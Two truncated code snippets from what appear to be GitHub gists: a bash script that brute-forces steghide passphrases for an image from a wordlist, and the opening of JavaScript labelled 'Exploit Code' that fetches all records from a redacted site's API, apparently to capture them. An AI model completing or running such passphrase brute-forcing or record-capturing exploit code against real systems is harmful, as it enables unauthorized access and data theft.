This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| printf "usage steghidebruteforcescript.sh imagefile.jpg wordlist.txt \n"; | |
| stegofile=$1; | |
| dict=$2; | |
| printf "Steghide Bruteforce (c) 2017 by Juan Escobar\n"; | |
| printf "stegofile: %s\n" "$stegofile"; | |
| printf "wordlist: %s\n\n" "$dict"; | |
| for passphrase in $(cat $dict); do |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |